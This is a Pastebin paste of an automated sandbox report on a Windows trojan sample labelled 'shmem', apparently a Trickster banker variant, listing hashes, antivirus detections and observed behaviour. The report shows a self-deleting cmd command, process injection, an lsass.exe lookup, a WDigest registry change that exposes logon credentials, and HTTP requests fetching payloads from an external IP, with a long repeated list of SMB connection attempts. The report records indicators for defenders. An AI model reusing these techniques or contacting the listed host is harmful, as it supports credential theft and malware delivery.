Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- * MalFamily: "shmem"
- * MalScore: 10.0
- * File Name: "Exes_768263addd1126790603ce99631c8ebd.exe"
- * File Size: 1344669
- * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
- * SHA256: "9dbce09b500f61d63813521986a65ae1a571099a2ddcea88d0247f7a32ada2ea"
- * MD5: "768263addd1126790603ce99631c8ebd"
- * SHA1: "1bc000a0098a765bff26b102e3863db45fb5ee21"
- * SHA512: "d76877e0ded093fc7cd3dc9d8c7c77d7c16a58fe69f6a9650725310b8b32dcb8c035d3c88cae0d9a11c97a469bfc513ab1c723545296fb953150996c1558a68f"
- * CRC32: "A42A7628"
- * SSDEEP: "24576:IAWmrKzy9eWwdvUpj1+NnrX3NrdXc8D3DFv2jlSdowmaRnrBBYnGB:rGu1ftMX3TzylEHQ6"
- * Process Execution:
- "Exes_768263addd1126790603ce99631c8ebd.exe",
- "Exes_768263addd1126790603ce99631c8ebd.exe",
- "cmd.exe",
- "timeout.exe"
- * Executed Commands:
- "\"C:\\Users\\user\\AppData\\Local\\Temp\\Exes_768263addd1126790603ce99631c8ebd.exe\"",
- "cmd.exe cmd.exe /c timeout 1 && del C:\\Users\\user\\AppData\\Local\\Temp\\Exes_768263addd1126790603ce99631c8ebd.exe\"",
- "timeout 1"
- * Signatures Detected:
- "Description": "Creates RWX memory",
- "Details":
- "Description": "Attempts to connect to a dead IP:Port (255 unique times)",
- "Details":
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "IP": "169.254.255.254:445"
- "Description": "Expresses interest in specific running processes",
- "Details":
- "process": "lsass.exe"
- "Description": "A process created a hidden window",
- "Details":
- "Process": "Exes_768263addd1126790603ce99631c8ebd.exe -> C:\\Users\\user\\AppData\\Local\\Temp\\Exes_768263addd1126790603ce99631c8ebd.exe"
- "Process": "Exes_768263addd1126790603ce99631c8ebd.exe -> cmd.exe cmd.exe /c timeout 1 && del C:\\Users\\user\\AppData\\Local\\Temp\\Exes_768263addd1126790603ce99631c8ebd.exe\""
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details":
- "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
- "suspicious_request": "http://185.183.96.26/tin.png"
- "suspicious_request": "http://185.183.96.26/sin.png"
- "Description": "Performs some HTTP requests",
- "Details":
- "url": "http://185.183.96.26/tin.png"
- "url": "http://185.183.96.26/sin.png"
- "Description": "Executed a process and injected code into it, probably while unpacking",
- "Details":
- "Injection": "Exes_768263addd1126790603ce99631c8ebd.exe(1644) -> Exes_768263addd1126790603ce99631c8ebd.exe(2972)"
- "Description": "Deletes its original binary from disk",
- "Details":
- "Description": "File has been identified by 22 Antiviruses on VirusTotal as malicious",
- "Details":
- "MicroWorld-eScan": "Trojan.GenericKD.41547271"
- "FireEye": "Generic.mg.768263addd112679"
- "McAfee": "Artemis!768263ADDD11"
- "Arcabit": "Trojan.Generic.D279F607"
- "APEX": "Malicious"
- "Paloalto": "generic.ml"
- "Kaspersky": "Trojan-Banker.Win32.Trickster.eoo"
- "BitDefender": "Trojan.GenericKD.41547271"
- "Ad-Aware": "Trojan.GenericKD.41547271"
- "Sophos": "Mal/Generic-S"
- "F-Secure": "Trojan.TR/AD.PatchedWinSwrort.bpkxi"
- "DrWeb": "Trojan.MulDrop4.25343"
- "McAfee-GW-Edition": "Artemis!Trojan"
- "Emsisoft": "Trojan.GenericKD.41547271 (B)"
- "Avira": "TR/AD.PatchedWinSwrort.bpkxi"
- "Microsoft": "Trojan:Win32/Casur.A!cl"
- "Endgame": "malicious (high confidence)"
- "ZoneAlarm": "Trojan-Banker.Win32.Trickster.eoo"
- "MAX": "malware (ai score=84)"
- "ESET-NOD32": "a variant of Win32/GenKryptik.DPSM"
- "Rising": "[email protected] (RDML:W4mBzfwxUxNC2Y/vAaOqsQ)"
- "GData": "Trojan.GenericKD.41547271"
- "Description": "Created network traffic indicative of malicious activity",
- "Details":
- "signature": "ET USER_AGENTS Suspicious User-Agent (contains loader)"
- * Started Service:
- * Mutexes:
- "gcc-shmem-tdm2-use_fc_key",
- "gcc-shmem-tdm2-sjlj_once",
- "gcc-shmem-tdm2-fc_key"
- * Modified Files:
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-0000000000-0000000000-0000000000-1000\\00000000-0000-0000-0000-000000000000b_00000000-0000-0000-0000-000000000000",
- "C:\\Users\\user\\AppData\\Local\\Temp\\log_install.tmp",
- "\\??\\PIPE\\wkssvc",
- "\\Device\\LanmanDatagramReceiver",
- "\\??\\PIPE\\DAV RPC SERVICE"
- * Deleted Files:
- "C:\\Users\\user\\AppData\\Local\\Temp\\log_install.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\Exes_768263addd1126790603ce99631c8ebd.exe"
- * Modified Registry Keys:
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\SecurityProviders\\WDigest\\UseLogonCredential"
- * Deleted Registry Keys:
- * DNS Communications:
- * Domains:
- * Network Communication - ICMP:
- * Network Communication - HTTP:
- "count": 1,
- "body": "",
- "uri": "http://185.183.96.26/tin.png",
- "user-agent": "WinHTTP loader/1.0",
- "method": "GET",
- "host": "185.183.96.26",
- "version": "1.1",
- "path": "/tin.png",
- "data": "GET /tin.png HTTP/1.1\r\nCache-Control: no-cache\r\nConnection: Keep-Alive\r\nPragma: no-cache\r\nUser-Agent: WinHTTP loader/1.0\r\nHost: 185.183.96.26\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://185.183.96.26/sin.png",
- "user-agent": "WinHTTP loader/1.0",
- "method": "GET",
- "host": "185.183.96.26",
- "version": "1.1",
- "path": "/sin.png",
- "data": "GET /sin.png HTTP/1.1\r\nCache-Control: no-cache\r\nConnection: Keep-Alive\r\nPragma: no-cache\r\nUser-Agent: WinHTTP loader/1.0\r\nHost: 185.183.96.26\r\n\r\n",
- "port": 80
- * Network Communication - SMTP:
- * Network Communication - Hosts:
- * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment